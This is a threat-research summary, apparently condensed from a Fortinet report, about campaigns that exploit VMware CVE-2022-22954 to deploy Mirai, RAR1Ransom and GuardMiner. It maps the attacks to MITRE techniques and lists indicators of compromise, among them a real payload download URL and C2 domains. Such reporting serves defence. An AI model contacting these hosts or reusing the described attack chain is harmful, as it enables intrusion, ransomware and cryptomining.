Threat Research

Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability

Securonix

In April, VMware patched CVE-2022-22954, but attacks exploiting remote code execution via server-side template injection persisted, delivering Mirai variants, RAR1Ransom, and GuardMiner payloads to exposed VMware Workspace ONE Access and Identity Manager instances. Fortinet FortiGuard Labs details how these campaigns act post-exploitation, the involved malware behaviors, and the protections in place.
#CVE-2022-22954 #Mirai #RAR1Ransom #GuardMiner #VMwareWorkspaceONEAccess

Keypoints

  • Patch status: CVE-2022-22954 was addressed in April, but exploitation attempts continued in the wild, enabling remote command execution.
  • Campaigns observed: In August, Mirai, RAR1Ransom, and GuardMiner payloads were deployed against exposed VMware services.
  • Mirai variant behavior: downloads a Mirai payload from a remote host, decodes configuration, and uses a C2 domain (cnc.goodpackets.cc) for control and heartbeats.
  • RAR1Ransom mechanics: uses WinRAR (rar.exe) to encrypt files with a password, drops a ransom note, and relies on a multi-file initialization kit to persist and spread.
  • GuardMiner role: a cross‑platform miner (xmrig derivative) that also drops Linux init.sh and updates an infection toolkit like networkmanager.exe, expanding across Windows and Linux.
  • Initial access and persistence: exploitation via CVE, PowerShell and Unix shells for payload delivery, and scheduled tasks to maintain persistence.
  • Defensive guidance: Fortinet provides IPS and antivirus detections and emphasizes patching and monitoring for suspicious processes.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of CVE-2022-22954 leading to remote code execution on VMware Workspace ONE Access and Identity Manager. ‘remote code execution on VMware Workspace ONE Access and Identity Manager.’
  • [T1059.001] PowerShell – Windows payloads use PowerShell to download and execute scripts (init.ps1). ‘One leveraged PowerShell to download “init.ps1”’.
  • [T1059.004] Unix Shell – Linux deployment uses scripts like init.sh (downloaded via curl, wget, or similar). ‘init.sh’ downloaded and executed on Linux.
  • [T1105] Ingress Tool Transfer – Downloading payloads from remote servers (e.g., Mirai variant from http://107.189.8.21/pedalcheta/cutie.x86_64). ‘downloads Mirai variant from http[:]//107[.]189[.]8[.]21/pedalcheta/cutie[.]x86_64’.
  • [T1110] Brute Force – Brute-force functionality to guess credentials; decoded password lists show commonly used and IoT defaults. ‘The decoded passwords are listed below, they are commonly used passwords and also some default credentials for well-known IoT devices.’
  • [T1027] Obfuscated/Compressed Files – Data obfuscation via XOR to reveal configuration and C2 host. ‘we XOR the data with 0x54 and get C2 server is “cnc[.]goodpackets[.]cc”’.
  • [T1486] Data Encrypted for Impact – RAR1Ransom encrypts user files with a password using WinRAR. ‘RAR1ransom drops “rar.exe” … to compress a victim’s files with a password.’
  • [T1053.005] Scheduled Task – Persistence by creating a scheduled task via init.ps1. ‘sustain persistance via creating scheduled task’.

Indicators of Compromise

  • [Domain] C2 domain – cnc.goodpackets.cc, crustwebsites.net (used for command and control and backup links)
  • [IP Address] 107.189.8.21 – host for Mirai variant payload download
  • [SHA256] 66db83136c463441ea56fb1b5901c505bcd1ed52a73e23d7298f7055db2108d1, 4761e5d9bd3ebe647fbd7840b7d2d9c1334bde63d5f6b05a4ed89af7aa3a6eab (and 2 more hashes)
  • [Filename] READ_TO_DECRYPT.txt – ransom note dropped alongside encrypted files
  • [Filename] rar.exe – WinRAR-based ransomware component used to encrypt files
  • [Filename] encrypt.exe – ransomware payload binary used to encrypt data

Read more: https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability